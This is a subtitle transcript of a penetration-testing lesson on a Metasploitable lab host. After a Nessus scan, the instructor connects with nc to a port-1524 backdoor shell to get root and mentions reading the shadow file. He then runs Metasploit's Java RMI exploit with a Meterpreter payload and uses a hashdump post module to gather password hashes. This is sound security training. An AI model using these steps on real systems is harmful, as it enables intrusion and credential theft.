﻿1
00:00:00,360 --> 00:00:02,740
So the scan is completed in 17 minutes.

2
00:00:03,390 --> 00:00:08,940
Now, another pause here, because I disabled the Windows plugins, it seems as if the Windows systems

3
00:00:08,940 --> 00:00:10,640
don't have critical vulnerabilities.

4
00:00:10,980 --> 00:00:15,960
That's not right; my Windows XP in particular has several critical vulnerabilities.

5
00:00:16,530 --> 00:00:21,930
If you didn't disable the Windows plugins, you're supposed to see some more vulnerabilities for Windows

6
00:00:21,930 --> 00:00:22,440
systems.

7
00:00:23,720 --> 00:00:30,680
Now, to see the results of the Metasploitable scan in detail, let's click the Metasploitable host, 206.

8
00:00:32,020 --> 00:00:39,100
Nessus Home found 10 critical vulnerabilities with this scan configuration, but please note that

9
00:00:39,100 --> 00:00:46,000
the configuration affects the results, so the target systems may have more vulnerabilities than reported.

10
00:00:47,740 --> 00:00:54,100
If there is a vulnerability and it's not found in a scan, we call it a false negative.

11
00:00:55,230 --> 00:01:01,400
I'm sure you know that the critical vulnerabilities are the most dangerous ones, but that's where it

12
00:01:01,400 --> 00:01:02,040
gets good.

13
00:01:02,060 --> 00:01:04,450
They are the most exploitable ones in general.

14
00:01:05,180 --> 00:01:11,240
So let's click on one of these critical vulnerabilities, for example, Bind Shell Backdoor Detection.

15
00:01:12,670 --> 00:01:18,280
Well, look at the description: it says a shell is listening on the port without any authentication

16
00:01:18,280 --> 00:01:19,060
being required.

17
00:01:19,750 --> 00:01:21,880
This is obviously a backdoor.

18
00:01:23,020 --> 00:01:25,030
The port number is 1524.

19
00:01:25,540 --> 00:01:31,270
Now let's check if the finding is a true positive. Go to the terminal screen.

20
00:01:31,850 --> 00:01:40,810
I use the Netcat tool to connect: simply type nc, the target IP and the target port, 1524, and we're

21
00:01:40,810 --> 00:01:41,020
in.

22
00:01:42,430 --> 00:01:44,230
We have the shell of Metasploitable.

23
00:01:45,670 --> 00:01:54,130
Type whoami to learn which user we are; we are the root user now. It was too simple, it's just

24
00:01:54,130 --> 00:01:54,880
not fun.

25
00:01:54,880 --> 00:01:56,620
And, you know, I don't like it.

26
00:01:56,620 --> 00:01:57,610
I like a good challenge.

27
00:01:57,610 --> 00:01:57,920
Right.

28
00:01:58,330 --> 00:02:03,010
I mean, we are the root user and we can access anything we want.

29
00:02:03,010 --> 00:02:07,420
For example, the shadow file, which contains the hashes of the users' passwords.

30
00:02:14,510 --> 00:02:21,830
OK, back to the browser. Click on the Back to Vulnerabilities link to return to the vulnerabilities

31
00:02:21,830 --> 00:02:22,640
of Metasploitable.

32
00:02:23,750 --> 00:02:25,310
Now, I'd like to show you some more.

33
00:02:26,690 --> 00:02:33,710
Scrolling down the vulnerabilities, it shows 50 vulnerabilities per page by default, but let's make

34
00:02:33,710 --> 00:02:36,350
it 200 to see all the findings on a single page.

35
00:02:37,980 --> 00:02:43,320
Now, the findings are ordered by severity level, so Info is at the bottom.

36
00:02:44,290 --> 00:02:50,470
Findings with the severity level Info identify non-vulnerability information, which is,

37
00:02:50,470 --> 00:02:55,260
you know, nice to know, and it keeps it separate from the vulnerability detail.

38
00:02:57,070 --> 00:03:01,990
So here there's an Info finding, RMI Registry Detection. Let's click it.

39
00:03:02,880 --> 00:03:08,700
It says that the remote host is running an RMI registry, used for retrieving remote objects in the Java Remote

40
00:03:08,700 --> 00:03:10,300
Method Invocation system.

41
00:03:11,370 --> 00:03:17,220
So let's look through the exploits of the Metasploit Framework to see if there is any exploit for Java RMI.

42
00:03:38,710 --> 00:03:42,160
Open a terminal screen and run msfconsole.

43
00:03:49,990 --> 00:03:55,180
So here we have msfconsole. Let's search for the exploits of RMI.

44
00:04:09,150 --> 00:04:10,190
Too many results.

45
00:04:11,750 --> 00:04:15,650
To keep it more specific, I want to search for Java RMI.

46
00:04:22,310 --> 00:04:30,470
So we have two auxiliaries and two exploits at this time. Look at the exploit in the last line: this

47
00:04:30,470 --> 00:04:37,100
module takes advantage of the default configuration of the RMI Registry and RMI Activation services,

48
00:04:37,520 --> 00:04:39,950
which allows loading classes from any remote

49
00:04:39,950 --> 00:04:40,640
URL.

50
00:04:41,800 --> 00:04:44,020
Let's try to use it on our RMI port.

51
00:04:45,340 --> 00:04:49,570
Please don't worry, I am going to explain what all of these mean.

52
00:04:49,750 --> 00:04:53,050
I just want to show you an example at the beginning.

53
00:04:53,440 --> 00:04:54,220
So bear with me.

54
00:04:54,790 --> 00:04:57,760
I use the module name with the full path.

55
00:04:58,580 --> 00:05:04,090
You can simply select the module name and click the middle mouse button to copy and paste it.

56
00:05:05,400 --> 00:05:10,470
Type show payloads to see the payloads that can be used with this module.

57
00:05:12,130 --> 00:05:15,050
So I want to use this payload to have a Meterpreter session.

58
00:05:15,110 --> 00:05:20,020
Again, don't worry, I'll explain what Meterpreter is soon, but just copy and paste the payload

59
00:05:20,020 --> 00:05:25,920
name. Type show options to see the parameters of the exploit and of the payload as well.

60
00:05:27,010 --> 00:05:34,660
Set the remote host (RHOST) to Metasploitable, 206. The default remote port is the same as our port, one

61
00:05:34,660 --> 00:05:35,560
zero nine nine (1099).

62
00:05:36,550 --> 00:05:44,500
SRVHOST is the local host to listen on; set this to be our Kali, 222.

63
00:05:45,500 --> 00:05:47,420
SRVPORT stays at its default.

64
00:05:49,180 --> 00:05:51,310
The other options are not required.

65
00:05:51,340 --> 00:05:52,450
I'll just leave them blank.

66
00:05:53,850 --> 00:06:01,200
Now, for the payload options, set the listen host (LHOST) to be our Kali, 222. The default

67
00:06:01,200 --> 00:06:07,590
listen port (LPORT), 4444, is good. And finally, type exploit to run the exploit.

68
00:06:15,060 --> 00:06:18,210
So there, it looks like we have a Meterpreter session.

69
00:06:19,250 --> 00:06:26,720
Type sessions -l to list the active sessions; be patient, we'll see them in detail. Type sessions

70
00:06:27,060 --> 00:06:34,070
-i <session ID> to interact with a session, and here we are, we're in now.

71
00:06:34,070 --> 00:06:38,380
I'm going to show you what we can do with a Meterpreter session in the following chapter.

72
00:06:38,690 --> 00:06:44,180
But here are a couple of Meterpreter commands: sysinfo to see the system information.

73
00:06:48,050 --> 00:06:50,660
hashdump to gather password hashes.

74
00:06:51,560 --> 00:06:58,970
Now, there's no such command for this system. Thankfully, we have an alternative for this: type run post/linux

75
00:06:59,420 --> 00:07:05,060
/gather/hashdump, hit enter, and collect the fruits of your labor.

76
00:07:06,210 --> 00:07:12,890
So as you see here, we found another way to exploit the system, even though the finding was just Info.

77
00:07:13,710 --> 00:07:17,430
So I hope you understand not to underestimate any finding.

